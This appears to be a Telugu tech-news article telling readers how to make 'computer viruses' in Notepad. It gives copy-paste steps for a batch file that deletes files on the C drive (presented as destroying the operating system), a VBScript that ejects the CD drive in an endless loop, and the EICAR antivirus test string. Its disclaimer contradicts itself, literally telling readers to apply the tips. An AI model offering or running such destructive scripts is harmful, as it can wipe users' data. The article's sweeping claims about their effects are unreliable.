కంప్యూటర్ వైరస్‌ను సృష్టించటం ఎలా..?

|

ఇంటర్నెట్ పై ఆధారపడి జీవిస్తోన్న నేటి ఆధునిక కమ్యూనికేషన్ ప్రపంచంలో సెకనుకో వైరస్ దాడి కంప్యూటింగ్ ప్రపంచాన్ని కలవరపాటుకు గురిచేస్తోంది. వైరస్ అనేది ఓ హానికరమైన ప్రోగ్రామ్. చెడ్దు ఉద్దేశ్యంతో రూపొందించబడే ఈ హానికరమైన ప్రోగ్రామ్, మీ కంప్యూటర్‌లోకి చొరబడినట్లయితే డివైస్‌లోని డేటాతో పాటు ఆపరేటిగ్ సిస్టంను పూర్తిగా ధ్వంసం చేసేస్తుంది. వైరస్ అనేది చాలా రకాలుగా ఉంటుంది. వీటి స్ధాయిని బట్టి ప్రమాద తీవ్రత ఉంటుంది.

Read More : రూ.999కే Jio 4G VoLTE ఫోన్!

పాఠకులకు ముఖ్యమైన గమనిక

పాఠకులకు ముఖ్యమైన గమనిక

ఇంతలా విధ్వంసం సృష్టించే వైరస్ లను అసలు ఎలా తయారు చేస్తారు అన్న సందేహం మీకు కలుగుతూ ఉండొచ్చు. వాస్తవానికి, మీరు కూడా కంప్యూటర్ వైరస్ ను సృష్టించుకోవచ్చు. కొన్ని సులువైన పద్ధతుల్లో కంప్యూటర్ వైరస్‌లను సృష్టించుకోవచ్చు.

రూ.1,999కే Lenovo P2 స్మార్ట్‌ఫోన్రూ.1,999కే Lenovo P2 స్మార్ట్‌ఫోన్

(పాఠకులకు ముఖ్యమైన గమనిక : వైరస్ గురించి మీలో అవగాహన కలిగించేందుకు మాత్రమే ఈ ఆర్టికల్‌ను ప్రచురించటం జరుగుతోంది. దయచేసి ఈ టిప్స్‌ను మీమీ కంప్యూటర్‌లలో అప్లై చేయండి. ఒకవేళ మీరు చేసినట్లయితే కంప్యూటర్ డేటా మొత్తం తుడిచిపెట్టుకుపోతుంది. దాని వల్ల మీకే నష్టం వాటిల్లుతుంది. గుర్తుపెట్టుకోగలరు)

ప్రమాదకర  వైరస్‌ను సృష్టించటం ఎలా..?
 

ప్రమాదకర వైరస్‌ను సృష్టించటం ఎలా..?

స్టెప్ 1

ముందుగా విండోస్ కంప్యూటర్‌లో నోట్‌ప్యాడ్‌ను ఓపెన్ చేయాలి.

స్టెప్ 2

క్రింద సూచించిన కోడ్‌ను కాపీ చేసి ఆ నోట్‌ప్యాడ్ పై పేస్ట్ చేయాలి.

@Echo off
Del C: *.* |y

స్టెప్ 3

ఇప్పుడు నోట్‌ప్యాడ్ ఫైల్‌ను virus.bat పేరుతో సేవ్ చేయాలి. ( ఫైల్‌ను సేవ్ చేసే క్రమంలో .bat ముందు ఇష్టమొచ్చిన పేరును పెట్టుకోవచ్చు. చివరిలో మాత్రం .bat తప్పనిసరి)

ఇప్పుడు ఆ ఫైల్‌ను రన్ చేసే ప్రయత్నం చేసినట్లయితే కంప్యూటర్ లోని C driveతో పాటు ఆపరేటింగ్ సిస్టం పూర్తిగా కరప్ట్ కాబడుతుంది.

రూ.346తో సంవత్సరమంతా ఐడియా 4జీరూ.346తో సంవత్సరమంతా ఐడియా 4జీ

ప్రమాదకర  Cdrom వైరస్‌ను  సృష్టించటం ఎలా..?

ప్రమాదకర Cdrom వైరస్‌ను సృష్టించటం ఎలా..?

స్టెప్ 1

ముందుగా విండోస్ కంప్యూటర్‌లో నోట్‌ప్యాడ్‌ను ఓపెన్ చేసి, ఆ ఫైల్‌ను Cdrom.vbs పేరుతో సేవ్ చేసుకోండి. ( ఫైల్‌ను సేవ్ చేసే క్రమంలో .vbs ముందు ఇష్టమొచ్చిన పేరును పెట్టుకోవచ్చు. చివరిలో మాత్రం .vbs తప్పనిసరి)

స్టెప్ 2

క్రింద సూచించిన కోడ్‌ను కాపీ చేసి ఆ నోట్‌ప్యాడ్ పై పేస్ట్ చేయాలి.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

ఇప్పుడు ఆ ఫైల్‌ పై డబల్ క్లిక్ చేసినట్లయితే కంప్యూటర్ లోని CD/DVD డ్రైవ్ కంటిన్యూస్‌గా బయటకు వచ్చేస్తుంటుది.

సంక్రాంతి బరిలో సామ్‌సంగ్ ఫోన్, రూ.8,490కేసంక్రాంతి బరిలో సామ్‌సంగ్ ఫోన్, రూ.8,490కే

యాంటీ వైరస్‌ను పరీక్షించేందుకు వైరస్‌  సృష్టించటం ఎలా..?

యాంటీ వైరస్‌ను పరీక్షించేందుకు వైరస్‌ సృష్టించటం ఎలా..?

ముందుగా విండోస్ కంప్యూటర్‌లో నోట్‌ప్యాడ్‌ను ఓపెన్ చేసి, ఆ ఫైల్‌ను "EICAR.COM" పేరుతో సేవ్ చేయండి.
క్రింద సూచించిన కోడ్‌ను కాపీ చేసి ఆ నోట్‌ప్యాడ్ పై పేస్ట్ చేయాలి.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

ఇలా చేసిన వెంటనే మీ కంప్యూటర్‌లోని యాక్టివ్ యాంటీవైరస్ వెంటనే ఈ వైరస్ ఫైల్‌ను గుర్తించి రూమూవ్ చేసే ప్రయత్నం చేస్తుంది.

లేటెస్ట్ స్మార్ట్‌ఫోన్స్ బెస్ట్ ఆన్‌లైన్ డీల్స్ కోసం ఇక్కడ క్లిక్ చేయండి

Most Read Articles
Best Mobiles in India

English summary
How To Create Computer Virus. Read More in Telugu Gizbot...

ఉత్తమ ఫోన్లు

న్యూస్ అప్ డేట్స్ వెంటనే పొందండి
Enable
x
Notification Settings X
Time Settings
Done
Clear Notification X
Do you want to clear all the notifications from your inbox?
Settings X
X